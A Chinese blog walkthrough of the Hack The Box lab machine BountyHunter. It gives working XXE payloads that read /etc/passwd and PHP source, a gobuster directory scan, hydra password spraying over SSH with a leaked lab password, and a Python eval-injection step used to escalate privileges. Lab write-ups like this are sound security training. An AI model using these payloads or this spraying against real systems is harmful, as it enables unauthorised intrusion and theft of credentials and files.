hackthebox-Tracks-CREST_CRT-BountyHunter

最新推荐文章于 2023-05-23 17:51:48 发布
最新推荐文章于 2023-05-23 17:51:48 发布
阅读量67 收藏
点赞数
分类专栏: hackthebox 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lalalaze/article/details/128954166
版权

开放端口

访问

burp抓包

猜测存在XML注入

测试

<?xml version="1.0"?><!DOCTYPE replace [<!ENTITY example "1111">]>

<bugreport>

<title>&example;</title>

<cwe>2</cwe>

<cvss>3</cvss>

<reward>4</reward>

</bugreport>

存在xml

构造payload读取 /etc/passwd文件

<?xml version="1.0"?><!DOCTYPE replace [<!ENTITY example SYSTEM 'file:///etc/passwd'>]>

<bugreport>

<title>&example;</title>

<cwe>2</cwe>

<cvss>3</cvss>

<reward>4</reward>

</bugreport>

gobuster对网站目录进行爆破:

gobuster dir -u http://10.129.224.126 -w /usr/share/dirb/wordlists/big.txt -x php -o file.txt

python构造exp

对data数据进行改造

PD94bWwgdmVyc2lvbj0iMS4wIj8%2bPCFET0NUWVBFIHJlcGxhY2UgWzwhRU5USVRZIGV4YW1wbGUgU1lTVEVNICdmaWxlOi8vL2V0Yy9wYXNzd2QnPl0%2bDQogICAgICAgIDxidWdyZXBvcnQ%2bDQogICAgICAgIDx0aXRsZT4mZXhhbXBsZTs8L3RpdGxlPg0KICAgICAgICA8Y3dlPjI8L2N3ZT4NCiAgICAgICAgPGN2c3M%2bMzwvY3Zzcz4NCiAgICAgICAgPHJld2FyZD40PC9yZXdhcmQ%2bDQogICAgICAgIDwvYnVncmVwb3J0Pg%3d%3d

PD94bWwgdmVyc2lvbj0iMS4wIj8+PCFET0NUWVBFIHJlcGxhY2UgWzwhRU5USVRZIGV4YW1wbGUgU1lTVEVNICdmaWxlOi8vL2V0Yy9wYXNzd2QnPl0+DQogICAgICAgIDxidWdyZXBvcnQ+DQogICAgICAgIDx0aXRsZT4mZXhhbXBsZTs8L3RpdGxlPg0KICAgICAgICA8Y3dlPjI8L2N3ZT4NCiAgICAgICAgPGN2c3M+MzwvY3Zzcz4NCiAgICAgICAgPHJld2FyZD40PC9yZXdhcmQ+DQogICAgICAgIDwvYnVncmVwb3J0Pg==

注 对特殊符号进行url解码(%2b + ; %3d =)

exp1:

对其中想要的内容进行匹配

exp2:

成功获取到想要的内容

要获取php文件的内容,可以通过

<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE replace [<!ENTITY example SYSTEM 'php://filter/convert.base64-encode/resource=index.php'>]>

将文件内容先进行base64编码后传输出来

exp3:

成功获得php文件内容

修改为更加方便的exp

exp4:

成功执行

gobuster爆破结果

查看 db.php

出现账号密码

admin/m19RoAU0hP41A1sTsq6K

查看portal.php

查看 log_submit.php

对 /etc/passwd 文件查看用户

存在 root,development用户

尝试密码喷洒

hydra -L uname.txt -p m19RoAU0hP41A1sTsq6K 10.129.224.126 ssh

ssh登录靶机

成功登录,但只有普通用户权限

获取普通用户flag

b1f5888fae3e5af4800a5dc9b67fbe70

查看授权的命令列表

查看 /opt/skytrain_inc/ticketValidator.py

对代码进行分析

根据要求构造票据

# Skytrain Inc

## Ticket to a b c d

__Ticket Code:__

**144

使用授权命令进行测试

 

成功

尝试执行命令

# Skytrain Inc

## Ticket to a b c d

__Ticket Code:__

**144+__import__("os").system("id")

成功执行 id 命令

尝试获取flag

 

成功获取flag

51223cf305c258ae69c4e20c45920c1b

尝试提权

提权成功

参考视频:https://www.youtube.com/watch?v=5axsDhumfhU&ab_channel=IppSec

:)--+
关注
专栏目录
t3_Predicting the Markets w ML_sklearn_scatter_PairGrid_R-squared_log returns_Lasso_ridge_KNN_SVM_LR
Linli522362242的专栏
12-03 5672
In the last chapter, we learned how to design trading strategies, create trading signals, and implement advanced concepts, such as seasonality in trading instruments. Understanding those concepts in greater detail is a vast field comprising stochastic...
【Apollo7.0】感知模块(3):激光雷达感知中的目标跟踪算法--lidar_obstacle_tracking---multi_target_tracker
yangda_9527的博客
04-17 1782
apollo7.0, 激光雷达感知中的目标跟踪算法。
如何为目标识别追踪项目mikel-brostrom/yolov8_tracking增加计数功能?
专注“目标检测”领域技术分享
02-21 4641
代码的网址项目名:Real-time multi-object tracking and segmentation using Yolov8(1)它的识别和分割是YOLO8完成的。它的多目标追踪是由后面四种算法实现的(botsort,bytetrack,ocsort,strongsort)(2)它这个是实时的Real-time,识别、跟踪、分割的速度很快。
ROS Navigation-----costmap_2d简介
倔强不倒翁的博客
11-30 8697
costmap_2d简介
memory-profiler
既然选择了远方 便只顾风雨兼程 - 永强
08-26 2485
memory-profiler https://pypi.org/project/memory-profiler/ A module for monitoring memory usage of a python program. 用于监视 python 程序的内存使用情况的模块。 1. Memory Profiler This is a python module for monitoring ...
Faster R-CNN论文翻译——中英文对照
热门推荐
SnailTyan
01-22 4万+
文章作者:Tyan 博客:noahsnail.com &nbsp;|&nbsp; CSDN &nbsp;|&nbsp; 简书 声明:作者翻译论文仅为学习,如有侵权请联系作者删除博文,谢谢! 翻译论文汇总:https://github.com/SnailTyan/deep-learning-papers-translation Faster R-CNN: Towards Real-Time ...
Towards Real-Time Multi-Object Tracking(JDE)
qq_45033722的博客
07-27 2739
JDE
【网络仿真】ns-3基础(上)
bajiaoyu517的博客
09-11 5255
目标:看完《ns3》,重点:如何写拓扑、模块 1 ns-3初识 资料: ns-3官网:http://www.nsnam.org/ ns-3官方开发文档:https://www.nsnam.org/releases/ns-3-34/documentation/ ns-3维基百科(文档中没有的内容)、FAQ问题解答:https://www.nsnam.org/support/ ns-3相关文献:https://www.nsnam.org/education/ 2 ns-3快速上手 使用waf配置编译ns-3
AAAI2024 The Thirty-Eighth Conference on Artificial Intelligence
HelloWorld的博客
05-23 1万+
For information about past AAAI Conferences, please consult the following pages.https://aaai.org/conference/aaai/https://aaai.org/aaai-conference/2024 年 2 月在加拿大温哥华举行的第 38 届 AAAI 人工智能年度会议The 38th Annual AAAI Conference on Artificial IntelligenceMain Confere
Faster R-CNN文章翻译——中英文对照
算法之美
11-23 4429
Faster R-CNN文章翻译——中英文对照
Overpass_for_Magic_Tracks_-_easy_print_magic_3dpstl_
10-03
标题 "Overpass_for_Magic_Tracks_-_easy_print_magic_3dpstl_" 暗示了这是一个关于3D打印的项目,特别设计用于Magic Tracks,一种可拼接、灵活弯曲的赛车轨道。"3dp"代表3D打印,而"magic 3dpstl"可能是指这个项目...
py-eddy-tracker-master_satphy_python_tracker_tracking_中尺度涡_
10-03
实现对中尺度涡的标注,完成中尺度涡分布的绘图
react-concurrent-mode-typescript-example::shuffle_tracks_button:在TypeScript中使用React并发模式的示例
05-06
:shuffle_tracks_button: React并发模式TypeScript示例 这是一个带有TypeScript的项目示例。 此外,它启用了实验并发模式和暂挂功能,并包括适当的实验类型。 目的是您可以探索和试验新的实验性功能,但可以使用...
MSRX6-20151123214504525_MagStripe_DecodeMagStripe_Tracks_MSRX6_源
09-28
read write erase all 3 tracks for magstripe cards
react-movable::shuffle_tracks_button:拖放您的React列表和表格。 无障碍。 小
02-05
React移动 ! 安装 yarn add react-movable 用法 import * as React from 'react' ; import { List , arrayMove } from 'react-movable' ; const SuperSimple : React .... const [ items , setItems ] = React ....
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8502
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
numexpr-2.8.3-cp38-cp38-win_amd64.whl
10-14
numexpr-2.8.3-cp38-cp38-win_amd64.whl
ujson-5.3.0-cp311-cp311-win_amd64.whl
10-14
ujson-5.3.0-cp311-cp311-win_amd64.whl
基于MATLAB车牌识别程序技术实现面板GUI.zip
最新发布
10-14
vos3000
通过echarts根据hangzhou-tracks.json绘制地图
05-14
然后,需要准备好数据文件hangzhou-tracks.json,该文件包含杭州市的地理信息。最后,可以根据数据文件使用echarts绘制地图。 以下是一个简单的例子: ```html <!DOCTYPE html> <meta charset="utf-8"> ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值